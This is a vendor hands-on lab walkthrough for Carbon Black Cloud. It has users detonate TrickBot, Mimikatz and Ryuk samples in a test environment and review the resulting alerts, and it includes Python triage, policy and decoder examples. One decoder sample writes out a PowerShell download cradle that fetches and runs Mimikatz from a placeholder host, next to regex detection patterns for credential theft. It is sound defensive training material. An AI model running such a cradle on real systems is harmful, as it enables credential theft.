VMware Carbon Black Cloud Malware Lab

 

About This Experience


This walkthrough will enable you to get hands on with Carbon Black Cloud. The Malware Lab contains actual attacks that you can run live in a test environment to see how prevention and visibility work in the Carbon Black Cloud solution suite. 

What is Carbon Black Cloud?

The VMware Carbon Black Cloud is a security solution suite comprised of the following products that may be used together or alone with a single lightweight agent and cloud-based console: 

  • Endpoint Standard: Next-generation antivirus (NGAV) and endpoint detection and response (EDR) solution. Carbon Black Endpoint Standard provides multiple layers of prevention to prevent/detect a variety of attacks such as known malware, non-malware and fileless attacks 
  • Enterprise EDR: Enables advanced threat hunting with out-of-the-box watchlists curated by Carbon Black and third parties such as MITRE, as well as the capabilities for creating and tracking customized indicators of compromise (IOCs) 
  • Audit & Remediation: Allows admins to gather current-state information across software, hardware and network variables, at scale across your environment, using the osquery schema 

For more security best practices for Carbon Black Cloud please visit VMware Carbon Black TechZone here

 

Overview


Before You Begin

Carbon Black Cloud Background

Attack Lab Detonation

Resources and References

  • Additional Resources

 

Before You Begin


In order to complete this product walkthrough please make sure you have the following:

  • A valid account in the VMware TestDrive environment, sign up here if you do not have one.
  • Outbound access on TCP and UDP ports 80, 443 and 8443; and, if using PCoIP, TCP and UDP 4172
  • A VMware Horizon Client installed on your machine (or use HTML Access from the browser)

 

Section 1: Accessing the Environment

To login to the environment, perform the following steps.

First, open a web browser of your choice and navigate to portal.vmtestdrive.com. Select LOG IN. If you do not already have an account please reference the instructions found here.


Enter your TestDrive Username and Password and select ENTER.


Next, locate the VMware Carbon Black Endpoint product under the Intrinsic Security tab.


Click LAUNCH, then LAUNCH VIA WORKSPACE ONE.


A new tab will open with Workspace ONE. Enter your TestDrive Username, then hit Next.


On the next screen, enter your TestDrive Password then hit Sign in.


Next, search for the Carbon Black Malware desktop. Click it to open the desktop, either via HTML Access or the Horizon Client.


Now you'll be on the Carbon Black Malware desktop. At this point you can begin the walkthrough steps listed below.


 

Carbon Black Cloud Background


 

Section 2: Walkthrough of the Carbon Black Cloud

The following section details the basics of accessing and using the Carbon Black Cloud. If you are already familiar with the Carbon Black Cloud you may skip this informational section. For a more in-depth walkthrough of the CBC please see the “Endpoint Standard Hands-On Lab” located here: https://labs.hol.vmware.com/HOL/catalogs/lab/10096 

2.1 Accessing the Carbon Black Cloud

The Carbon Black Cloud console is web-based with one lightweight agent deployed to endpoints. The single agent allows for consolidation across AV, EDR, vulnerability, and security auditing technologies. No stand-up or maintenance of on-premises servers is required – offloading work from infrastructure and security teams. 

The console is accessed through a supported web browser: 

  • Windows: Chrome, Edge, Firefox 
  • MacOS: Chrome, Firefox, Safari 

Login to Carbon Black Cloud: 

  • URL: https://defense-prod05.conferdeploy.net/
  • User: (listed in text file Carbon_Black_Cloud_Malware_Credentials.txt on the Carbon Black Malware desktop)  
  • Password: (listed in text file Carbon_Black_Cloud_Malware_Credentials.txt on the Carbon Black Malware desktop)

For purposes of this lab use Google Chrome to access the console. On login you will land on the CBC Dashboard. The main navigation menu is located on the left-hand side of the web console.  


CBC Dashboard | The dashboard gives a high-level overview of your environment with interactive widgets.

 

2.2 Alert Walkthrough

The Alerts page displays events of known threats or potential risks to your environment. To navigate to the Alerts page, select Alerts from the left-hand menu. 


Regularly review alerts to determine whether action needs to be taken or policies need to be modified. Alert notifications can be set up to email designated administrators when an alert occurs. Alerts can also be forwarded to a SIEM with the Carbon Black open API (https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/rest-api/).

 

An alert will show: 

  • Status – Run status and policy status
    • Run Status: process ran/did not run
    • Policy status: policy applied/no policy applied
  • First Seen – The time the alert's events first occurred 
  • Reason – High level overview of the reason the alert occurred 
  • S(everity) – Numerical score from 1 to 10, 1 being lowest severity and 10 being highest 
  • T(arget Value) – Acts as a multiplier for the severity score; target value can be assigned per policy group 
  • Device – Device that was alerted upon 

Alert severity indicates the relative importance of an alert and acts as a prioritization assistant (one being lowest severity and ten being highest, mission critical). The following describe the ranges of severity:  

  • Severity 1-2: Activities such as port scans, malware drops, changes to system configuration files, persistence, etc. 
  • Severity 3-5: Activities such as malware running, generic virus-like behavior, monitoring user input, potential memory scraping, password theft, etc. 
  • Severity 6-10: Activities such as reverse command shells, process hollowing, ransomware, destructive malware, hidden processes and tool sets, applications that talk on the network but should not, etc. 
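The severity bands and the target-value multiplier above are what an analyst uses to rank alerts, and the alert fields are what ends up in a SIEM. The following Python script is an added example for this walkthrough, not code from the lab or from the Carbon Black Cloud API client: it ranks a few constructed alert records carrying the fields listed above and renders them as CEF lines for syslog forwarding. The numeric target-value weights, the CEF field mapping and the sample records are assumptions; the real Alerts API JSON schema is not reproduced here.

```python
"""Triage Carbon Black Cloud style alerts and emit them as CEF for a SIEM.

Added example for this walkthrough, not code from the lab or from VMware.
The records in SAMPLE_ALERTS are constructed to carry the fields listed on
this page (status, first seen, reason, severity, target value, device); the
real Alerts API JSON schema differs and is not reproduced here. The numeric
target-value weights are an assumption: the page only says that target value
multiplies severity.
"""
from dataclasses import dataclass
from datetime import datetime, timezone

TARGET_VALUE_WEIGHT = {"LOW": 0.5, "MEDIUM": 1.0, "HIGH": 1.5, "MISSION_CRITICAL": 2.0}


@dataclass(frozen=True)
class Alert:
    alert_id: str
    first_seen: datetime
    device: str
    reason: str
    severity: int         # 1 (lowest) .. 10 (highest)
    target_value: str     # assigned per policy group
    process_ran: bool     # run status
    policy_applied: bool  # policy status


def severity_band(severity: int) -> str:
    """Map the 1-10 score onto the three bands described on this page."""
    if not 1 <= severity <= 10:
        raise ValueError(f"severity out of range: {severity}")
    if severity <= 2:
        return "low"
    if severity <= 5:
        return "medium"
    return "high"


def priority(alert: Alert) -> float:
    """Severity scaled by the device's target value."""
    return alert.severity * TARGET_VALUE_WEIGHT[alert.target_value]


def triage_order(alerts):
    """Highest priority first; among equals, alerts where the process ran
    without a policy action come first, then the most recent."""
    return sorted(
        alerts,
        key=lambda a: (priority(a), a.process_ran and not a.policy_applied, a.first_seen),
        reverse=True,
    )


def _cef_header(value: str) -> str:
    # CEF header fields escape backslash and pipe
    return value.replace("\\", "\\\\").replace("|", "\\|")


def _cef_ext(value: str) -> str:
    # CEF extension values escape backslash, equals and newline
    return value.replace("\\", "\\\\").replace("=", "\\=").replace("\n", "\\n")


def to_cef(alert: Alert) -> str:
    """Render one alert as a CEF:0 line, e.g. for syslog forwarding to a SIEM."""
    cef_severity = min(10, int(round(priority(alert))))  # CEF severity is 0..10
    header = "|".join(
        _cef_header(v)
        for v in ("CEF:0", "VMware", "Carbon Black Cloud", "1",
                  alert.alert_id, alert.reason, str(cef_severity))
    )
    extension = " ".join(
        f"{key}={_cef_ext(value)}"
        for key, value in (
            ("rt", alert.first_seen.strftime("%b %d %Y %H:%M:%S")),
            ("dvchost", alert.device),
            ("cn1Label", "severity"), ("cn1", str(alert.severity)),
            ("cs1Label", "targetValue"), ("cs1", alert.target_value),
            ("cs2Label", "processRan"), ("cs2", str(alert.process_ran)),
            ("cs3Label", "policyApplied"), ("cs3", str(alert.policy_applied)),
        )
    )
    return f"{header}|{extension}"


# Constructed sample records (not real console output).
SAMPLE_ALERTS = [
    Alert("A-1", datetime(2021, 8, 18, 14, 41, tzinfo=timezone.utc), "CBMALWARE-01",
          "Known malware document opened from outlook.exe; Deny applied",
          5, "MEDIUM", process_ran=False, policy_applied=True),
    Alert("A-2", datetime(2021, 8, 18, 14, 43, tzinfo=timezone.utc), "CBMALWARE-01",
          "powershell.exe attempted credential scraping; Terminate applied",
          8, "MEDIUM", process_ran=True, policy_applied=True),
    Alert("A-3", datetime(2021, 8, 18, 14, 45, tzinfo=timezone.utc), "CBMALWARE-02",
          "Port scan | inbound connections from unlisted process",
          2, "MISSION_CRITICAL", process_ran=True, policy_applied=False),
]

if __name__ == "__main__":
    for a in triage_order(SAMPLE_ALERTS):
        print(f"{priority(a):4.1f} {severity_band(a.severity):6} {to_cef(a)}")
```

Note that a severity-2 alert on a mission-critical device still ranks below a severity-5 alert on a medium-value device under these weights; tune the weights to your own asset classification before relying on the ordering.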

Filters are available on the left-hand side. Use them to narrow the list to alerts of interest by device, severity, etc. 

 

To view additional information about an alert, click the chevron to expand it. The Alert Details show additional information about the processes, behaviors (or TTPs – Tactics, Techniques, and Procedures), recommended steps for remediation, and notes/tags. 


CBC Alerts – Alert Details | Alert Details show additional information for further investigation into malicious/suspicious events. 

 

The Techniques section in Alert Details shows what behaviors, or TTPs (tactics, techniques, and procedures), were exhibited by the specified process. TTPs are color coded, with red indicating a higher severity. A TTP can be clicked to view further information about what it means. Carbon Black also correlates MITRE techniques to TTPs, and these are displayed as well. Clicking a MITRE technique takes you directly to the MITRE page for that technique. 

 

An alert visualization is generated for every alert. The visualization provides an easy-to-digest view of what occurred during the attack sequence. To view an alert visualization, called the Alert Triage, click the tree icon in the upper right of the alert details.


CBC Alerts | You can quickly pivot to the Alert Triage (tree icon), Investigate, or additional actions with the linked buttons.

 

The Alert Triage displays a tree containing events associated with the alert. A node represents an individual process or event. You can click a node to view additional process details on the right including reputation, TTPs (behaviors), command line used, and other information. The Alert Triage provides actionable information about the events that occurred during an alert: including where prevention was applied, source, and what the attacker may have been attempting.


CBC Alerts – Alert Triage | The Alert Triage shows the alert in a visual format; each node can be clicked for more details about the selected process on the right.

 

The alert can also be viewed in a log-level format for richer, process-level behavioral information such as command line, parent command line, whether the device was on- or off-premises at the time of the event, etc. These logs can be viewed in the Enriched Events section, which you can find by scrolling down to the bottom of the Alert Triage page.  


CBC Alerts – Enriched Events| Click the chevron next to an enriched event to view additional details. 

2.3 Policies Walkthrough

The CBC next-gen AV and EDR solution offers flexible Policies. Policies determine preventative rules as well as sensor functionality. Carbon Black gives administrators control and visibility into how prevention works in your environment. 

 

Each endpoint with a sensor installed will belong to a single policy. A policy defines how the sensor should behave on the endpoint, blocking/preventative rules, exclusions and allowances, and other configurations. 

 

In this lab we have put the Horizon TestDrive endpoints into the ‘Virtual Desktops’ policy group that copies settings from 'Standard' with some adjustments for VDI. The Standard policy group comes OOTB (alongside the Monitored and Advanced policies) and is meant to act as a day-one, production viable policy that gives additional preventative layers beyond a traditional AV. 

 

To view information about Policies and the Standard Policy Rules, navigate using the main left-hand menu to Enforce -> Policies. On the ‘Prevention’ tab you can see rules associated with the selected policy group. 


CBC Policies – Prevention Rules| Carbon Black offers OOTB production viable policies for day-one use while giving admins visibility and customizability into what is prevented and allowed.

 

Review the rules within the Standard policy before proceeding. In this lab the attacks you run will be prevented by rules within this policy, including rules for: 

  • Process: Known Malware 
  • Process (At Path): Excel, Invokes a command interpreter
  • Process: Not Listed, Performs ransomware-like behavior 
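To make the shape of such rules concrete, here is an added example in Python (not the sensor's rule engine, and not code from the lab): a small first-match rule evaluator for the three rules above, run over constructed process events that mirror the lab scenarios. The rule names, the TERMINATE actions, the event fields, the file paths and the rule order are assumptions made for illustration.

```python
"""Evaluate process events against policy rules of the kind listed above.

Added example for this walkthrough, not the Carbon Black sensor's own rule
engine. Rule names, the first-match-wins order, the TERMINATE actions, the
event fields and SAMPLE_EVENTS are all assumptions made for illustration.
"""
from dataclasses import dataclass
from fnmatch import fnmatchcase
from typing import Callable, Optional, Tuple

COMMAND_INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}


@dataclass(frozen=True)
class ProcessEvent:
    path: str             # image (or document) path the rule is evaluated against
    reputation: str       # KNOWN_MALWARE, TRUSTED_WHITE_LIST, NOT_LISTED, ...
    operation: str        # RUN, SPAWN, RANSOMWARE_BEHAVIOR, ...
    parent_path: str = ""
    child_path: str = ""  # set when operation is SPAWN


@dataclass(frozen=True)
class Rule:
    name: str
    selector: Callable[[ProcessEvent], bool]  # the "Process" / "Process (At Path)" part
    operation: str                             # the "attempts to ..." part
    action: str                                # DENY or TERMINATE


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def at_path(pattern: str) -> Callable[[ProcessEvent], bool]:
    return lambda e: fnmatchcase(e.path.lower(), pattern.lower())


def with_reputation(reputation: str) -> Callable[[ProcessEvent], bool]:
    return lambda e: e.reputation == reputation


def effective_operations(event: ProcessEvent) -> set:
    """Derive higher-level operations from the raw event: spawning cmd.exe or
    powershell.exe is what 'invokes a command interpreter' means here."""
    ops = {event.operation}
    if event.operation == "SPAWN" and _basename(event.child_path) in COMMAND_INTERPRETERS:
        ops.add("INVOKE_CMD_INTERPRETER")
    return ops


# The three rules this page calls out, with assumed actions.
STANDARD_POLICY = [
    Rule("Known malware runs or is running", with_reputation("KNOWN_MALWARE"), "RUN", "TERMINATE"),
    Rule("Excel invokes a command interpreter", at_path(r"*\excel.exe"), "INVOKE_CMD_INTERPRETER", "TERMINATE"),
    Rule("Not listed app performs ransomware-like behavior", with_reputation("NOT_LISTED"), "RANSOMWARE_BEHAVIOR", "TERMINATE"),
]


def evaluate(event: ProcessEvent, policy=STANDARD_POLICY) -> Optional[Tuple[str, str]]:
    """Return (rule name, action) for the first matching rule, or None to allow."""
    ops = effective_operations(event)
    for rule in policy:
        if rule.operation in ops and rule.selector(event):
            return rule.name, rule.action
    return None


# Constructed events mirroring the lab scenarios (not real sensor data).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Users\lab\AppData\Local\Temp\trickbot.docm", "KNOWN_MALWARE", "RUN",
                 parent_path=r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", "TRUSTED_WHITE_LIST", "SPAWN",
                 child_path=r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "TRUSTED_WHITE_LIST", "SPAWN",
                 child_path=r"C:\Windows\System32\notepad.exe"),
    ProcessEvent(r"C:\Users\lab\Downloads\unknown_tool.exe", "NOT_LISTED", "RANSOMWARE_BEHAVIOR"),
    # A trusted tool showing ransomware-like behavior: none of these three rules
    # applies, which is why the Standard policy carries further rules not listed here.
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "TRUSTED_WHITE_LIST", "RANSOMWARE_BEHAVIOR"),
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(_basename(event.path), "->", evaluate(event) or "allow")
```

The last sample event is the one to keep in mind when reading a policy: a rule scoped to "Not Listed" applications says nothing about trusted tools, so check which rule actually covers each behavior rather than assuming the policy name does.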

 

 

Attack Lab Detonation


 

Section 3: Attack Approach

Our prevention is enabled through context and controls to disrupt and defend; it does not matter whether it is ransomware or a zero-day. 

 

Most adversarial threats (like ransomware) follow a multi-staged attack approach. This begins with initial access, which in the Cognitive Attack Loop model corresponds to the reconnaissance and infiltration phases. During this phase attackers select a target and gather relevant information such as vulnerabilities, network topology, employee information, and so forth. Information gathered during this stage is then used to infiltrate, or deliver, an attack. 

 

Once access is attained, adversaries move into the next phases of the attack sequence: maintain and manipulate. The attacker is using their initial access to continue to improve their position and move forward with their goals. 

 

During the final attack phases of execute and exfiltrate the attacker carries out their end goals. For example, an attacker at this stage may be encrypting your data and holding it for ransom, or exfiltrating sensitive data for malicious use. Whatever the attacker's end goal is, we do not want them to be successful.

 

In this lab you will be able to detonate different attack scenarios, each of which aligns with one of the attack approach stages above. Before beginning any of the simulations make sure that you understand the Carbon Black Cloud through either prior use or Section 2 of this lab. 

 

 

Section 4: Spearphishing/Known Malware - Infiltrate

Spearphishing is a common technique to infiltrate and gain initial access to an environment. Much of the data attackers use to make an email seem legitimate is available online – and even posted by companies themselves. Public information such as employees, current projects, organizational charts, and so forth can be used to make a message appear legitimate to even discerning employees. 

 

4: Attack Instructions

4.1 Run the Attack

A phishing email is included in this lab. Let’s launch the message, taking the place of a well-meaning employee who has assumed the email’s legitimacy.  

  1. Open spearphishing email on Desktop "Please review ASAP.msg” 

Note: If 'Welcome to Outlook' message appears click 'Next'. Then select 'No' when prompted to setup Outlook with an email account. Finally click the checkbox next to 'Use Outlook without email account' and click 'Finish'.

 

The attachment contains known malicious signatures.  

  1. Double click the .docm attachment to open 

Note: If prompted to run in safe mode select 'no'

 

Notice that prevention is applied by the popup in the lower right-hand of the screen. Carbon Black administrators can choose to have popup messages when prevention is applied on the endpoint and even customize the message the popup contains. 

 

4.2 Investigate

We will now pivot to the Carbon Black Console to review information about the attack we just ran. If you are not currently on the Alerts page, navigate to Alerts using the left-hand menu. 

It is recommended to filter by endpoint to view alerts associated with the attacks run in your lab. Click the Carbon Black Malware Chrome shortcut on the Desktop to automatically be navigated to the Alerts page filtered by the appropriate tags.

You can find your device name by going to Windows Start -> Settings -> System -> About.

  1. Click to expand the Device tag on the left 
  2. Click the device name associated with your VDI instance 


In the spearphishing alert Carbon Black applied prevention due to the reputation of the file.  

  1. Click the chevron to view alert details 
  2. Click the tree icon to go to the alert triage 

Any nodes that have a red shield icon indicate that prevention was applied. Prevention actions are Deny (process not killed, prevents execution of behavior) or Terminate (kills process). Prevention actions can be configured in the policies. 


  1. Click the trickbot.docm node 

The prevention occurred due to reputation – Carbon Black Cloud assigns reputation based on known bad signatures, company assigned reputation, and cloud analytics. Note that for trickbot.docm the reputation is known malware and due to this prevention was applied. 

 

 

Section 5: Non-Malware/Trusted Tools - Maintain and Manipulate

After achieving initial access attackers attempt to move forward with their goals. One of the best ways of doing that is scraping credentials or abusing other existing binaries in the environment – like PowerShell. A trusted program like PowerShell is not blocked by traditional signature-based AV. It is commonly used across Windows environments for legitimate purpose – but attackers can leverage it for malicious intent as well. 

In this attack we will leverage PowerShell to attempt to perform malicious actions. Unlike the last alert we ran, PowerShell will not have a known malware reputation. Instead, Carbon Black applies prevention by looking at the behaviors that applications exhibit as well as recognizing that PowerShell is trying to execute content that contains malware (Mimikatz). Behavioral based rules can be specified to apply prevention to even trusted tools if they are being used maliciously.  

 

5: Attack Instructions

5.1 Run the Attack

We will use PowerShell to attempt to run an attack leveraging Mimikatz. The command has been encoded for further obfuscation. 

  1. Run PowerShell with administrative privileges (right click to run as admin) 
  2. Run command Set-ExecutionPolicy Unrestricted 
  3. Run the command below (the base64 argument is not reproduced in this copy of the page)
powershell.exe -encodedCommand <encoded command omitted>

Note: Set-ExecutionPolicy Unrestricted is a lab convenience only. Execution policy is not a security boundary (it is trivially bypassed, for example with -ExecutionPolicy Bypass or an encoded command), so do not loosen it on production endpoints; the prevention in this lab comes from the Carbon Black policy, not from execution policy.

Carbon Black applies prevention killing off the malicious PowerShell instance. PowerShell attempts to leverage Mimikatz to scrape credentials. We can recognize this malicious behavior and kill off the malicious instance while preventing the malicious actions. Note that PowerShell was allowed to run as expected until it began behaving maliciously. 

 

5.2 Investigate

We will now pivot to the Carbon Black Console to review information about the attack we just ran. If you are not currently on the Alerts page, navigate to Alerts using the left-hand menu. 

  1. Navigate to the new alert (severity 8) and click the chevron to expand alert details 


The reputation for PowerShell is trusted whitelist, which is expected; in most cases we expect PowerShell to run normally without prevention as it is used in many everyday IT activities. The power of Carbon Black is to define the behaviors that we want to prevent while allowing PowerShell to run when it should. 

  1. Click the tree icon to go to the alert triage 


  1. Click the first PowerShell.exe node 

In this attack PowerShell attempted to run encoded commands. Carbon Black automatically decodes encoded PowerShell scripts – easing time to remediation and enhancing investigative ability. 

  1. Click the CMD link in the process details pane on the right-hand side of the screen 


We can now see the formatted PowerShell script. In this case PowerShell downloads and attempts to invoke Mimikatz before being prevented by Carbon Black. The malicious actor would attempt to use Mimikatz to grab credentials for further attack actions.

  1. Click the 'X' to close out of the CMD Line screen
  2. Click the second PowerShell.exe node

Note the red shield icon indicating that Carbon Black applied prevention. Additional process details including behaviors exhibited by the specific instance of PowerShell can be viewed on the right.
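The encoding the sensor undoes here is simple: -EncodedCommand takes the base64 of the script's UTF-16LE bytes. The following Python script is an added example for this walkthrough (not the Carbon Black decoder, and not the lab's encoded command, which this copy of the page does not reproduce): it extracts and decodes the argument of -EncodedCommand or any of its accepted prefixes, then flags download-cradle, Invoke-Expression, Mimikatz and evasion indicators in a constructed sample. The sample script, the placeholder host example.invalid and the indicator regexes are assumptions; the script is only decoded, never executed.

```python
"""Decode PowerShell -EncodedCommand payloads and flag common tradecraft.

Added example for this walkthrough, not the Carbon Black sensor's decoder.
SAMPLE_SCRIPT and SAMPLE_CMDLINE are constructed for illustration (the
lab's real encoded command is not reproduced on this page); the host name
example.invalid is a placeholder. The script is only decoded, never run.
"""
import base64
import re
from typing import Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_FLAG = re.compile(r"-(e\w*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Indicator groups an analyst typically looks for once the script is readable (assumed set).
INDICATORS = {
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "mimikatz": re.compile(r"mimikatz|sekurlsa|DumpCreds", re.I),
    "nested_encoding": re.compile(r"FromBase64String", re.I),
    "defense_evasion": re.compile(r"-nop\w*|-NonInteractive|-w(?:indowstyle)?\s+hidden|Bypass", re.I),
}


def encode_command(script: str) -> str:
    """What -EncodedCommand expects: base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(encoded: str) -> str:
    raw = base64.b64decode(encoded, validate=True)
    if len(raw) % 2:
        raise ValueError("odd byte count: not a UTF-16LE payload")
    return raw.decode("utf-16-le")


def extract_encoded_argument(cmdline: str) -> Optional[str]:
    """Find the base64 argument of -EncodedCommand (or any prefix of it)."""
    for match in _FLAG.finditer(cmdline):
        if "encodedcommand".startswith(match.group(1).lower()):
            return match.group(2)
    return None


def analyze_command_line(cmdline: str) -> dict:
    """Decode if needed, then report which indicator groups fire on the
    command line plus the decoded script."""
    encoded = extract_encoded_argument(cmdline)
    script = decode_command(encoded) if encoded else ""
    text = cmdline + "\n" + script
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"was_encoded": encoded is not None, "script": script, "indicators": hits}


# Constructed sample: a download cradle that fetches and invokes Mimikatz.
SAMPLE_SCRIPT = (
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/Invoke-Mimikatz.ps1'); "
    "Invoke-Mimikatz -DumpCreds"
)
SAMPLE_CMDLINE = "powershell.exe -NoProfile -ExecutionPolicy Bypass -enc " + encode_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    result = analyze_command_line(SAMPLE_CMDLINE)
    print(result["script"])
    print("indicators:", ", ".join(result["indicators"]))
```

Two details matter in practice: the flag prefix check, because attackers rarely spell out -EncodedCommand, and the odd-byte-count check, which catches payloads that were base64 over UTF-8 rather than UTF-16LE (those will not run under -EncodedCommand but still appear in telemetry).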


 

Section 6: Ransomware - Execute and Exfiltrate

One of the biggest concerns in the security space is ransomware, and for good reason: this type of attack is costly and destructive. Ransomware families such as Ryuk and Conti attempt to spread across the network and encrypt or destroy data for maximum impact. In recent years ransomware has increased drastically in both prevalence and the level of destruction on users' systems, and once an attack reaches this stage the damage is often already done. 

 

6: Attack Instructions

6.1 Run the Attack

The ransomware in this scenario is embedded in a PowerShell script, and its known signature has been stripped from the binary so that reputation alone cannot catch it. This highlights behavior-based ransomware protection and imitates a zero-day ransomware attack. 

  1. Run PowerShell with administrative privileges (right click to run as admin) 
  2. Change directories with command cd 'C:\Users\Public\Desktop\Ransomware Artifacts\'
  3. Run command Set-ExecutionPolicy Unrestricted 
  4. Run command .\ryuk.ps1 

Notice that prevention is applied. When we visit the Carbon Black console, we can dig further into how we saw ransomware-like behaviors to prevent this modified piece of ransomware.

 

6.2 Investigate

We will now pivot to the Carbon Black Console to review information about the attack we just ran. If you are not currently on the Alerts page, navigate to Alerts using the left-hand menu. 

 

Through our native AMSI scripting integration Carbon Black Cloud is uniquely able to analyze and prevent scripts prior to allowing the binary to execute in your environment, ultimately reducing your overall risk. Even while applying prevention administrators can still get visibility into what an attacker/attack was attempting to do.

 


 

Click into the triage for more details. Scrolling down to the enriched events, expand the details for PowerShell to see the associated ransomware-like behaviors.

 


 

Beyond the AMSI scripting integration, Carbon Black has robust ransomware-prevention capabilities. Carbon Black NGAV/EDR can detect and prevent on behaviors associated with ransomware, including access to the master boot record, modification of volume shadow copies, and the encryption of data. Additionally, alongside the Carbon Black agent we deploy canary/decoy files to track and kill processes attempting to encrypt, modify or delete those files. Prevention can be applied to anything exhibiting those behaviors, even something that is not listed or has never been seen before (like a zero-day). 
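Of the behaviors listed above, the decoy files are the easiest to reason about with a working model. The following Python script is an added example for this walkthrough, not the Carbon Black sensor's decoy mechanism (whose file names, placement and response logic are not described on this page): it plants low-entropy decoy files in a temporary directory, records their hashes, then detects in-place high-entropy rewrites and renames/deletions caused by a stand-in "encryptor" that is confined to that directory. The decoy names and the 7.0 bits-per-byte entropy threshold are assumptions.

```python
"""Decoy (canary) files as a ransomware tripwire.

Added example for this walkthrough, not the Carbon Black sensor's decoy
mechanism, whose file names, placement and response logic are not described
on this page. Everything here runs inside a temporary directory; the
'encryptor' only overwrites the decoys it planted itself.
"""
import hashlib
import math
import secrets
import tempfile
from pathlib import Path

# Assumed names: chosen to sort early and look worth encrypting.
DECOY_NAMES = ("~$budget.xlsx", "passwords.txt", "zz_backup.docx")
HIGH_ENTROPY = 7.0  # bits per byte (assumed threshold); plain text is usually well under 6


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 8.0 means uniformly random (or encrypted)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def plant_decoys(root: Path) -> dict:
    """Write low-entropy decoys and return {path: sha256} as the baseline."""
    baseline = {}
    for name in DECOY_NAMES:
        path = root / name
        path.write_bytes(f"decoy file {name}, do not edit\n".encode() * 64)
        baseline[path] = hashlib.sha256(path.read_bytes()).hexdigest()
    return baseline


def check_decoys(baseline: dict) -> list:
    """Compare decoys with the baseline; return (name, verdict) for each change."""
    findings = []
    for path, digest in baseline.items():
        if not path.exists():
            findings.append((path.name, "missing: deleted or renamed"))
            continue
        data = path.read_bytes()
        if hashlib.sha256(data).hexdigest() == digest:
            continue
        entropy = shannon_entropy(data)
        kind = "high-entropy rewrite (encryption-like)" if entropy > HIGH_ENTROPY else "modified"
        findings.append((path.name, f"{kind}, entropy {entropy:.2f}"))
    return findings


def simulate_encryptor(root: Path, rename: bool, extension: str = ".locked") -> int:
    """Stand-in for ransomware: overwrite every file in root with random bytes
    and optionally rename it. Confined to root; returns the number of files touched."""
    touched = 0
    for path in sorted(p for p in root.iterdir() if p.is_file()):
        path.write_bytes(secrets.token_bytes(max(64, path.stat().st_size)))
        if rename:
            path.rename(path.with_name(path.name + extension))
        touched += 1
    return touched


def demo() -> tuple:
    """Plant, verify clean, overwrite in place, then rename; return the three finding lists."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        baseline = plant_decoys(root)
        clean = check_decoys(baseline)
        simulate_encryptor(root, rename=False)
        after_overwrite = check_decoys(baseline)
        simulate_encryptor(root, rename=True)
        after_rename = check_decoys(baseline)
    return clean, after_overwrite, after_rename


if __name__ == "__main__":
    for stage, findings in zip(("clean", "overwritten", "renamed"), demo()):
        print(stage, findings or "no change")
```

A polling check like this one is only a model; a real sensor hooks file operations and attributes them to the writing process so it can terminate it, which is the "track and kill" part described above. The entropy test is what distinguishes an encrypted rewrite from an ordinary edit, and the missing-file verdict covers the rename-with-extension pattern common to ransomware.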

 


  

 

Additional Resources


 

Contact

Carbon Black Endpoint Standard NGAV/EDR

Additional Carbon Black TestDrive Experiences
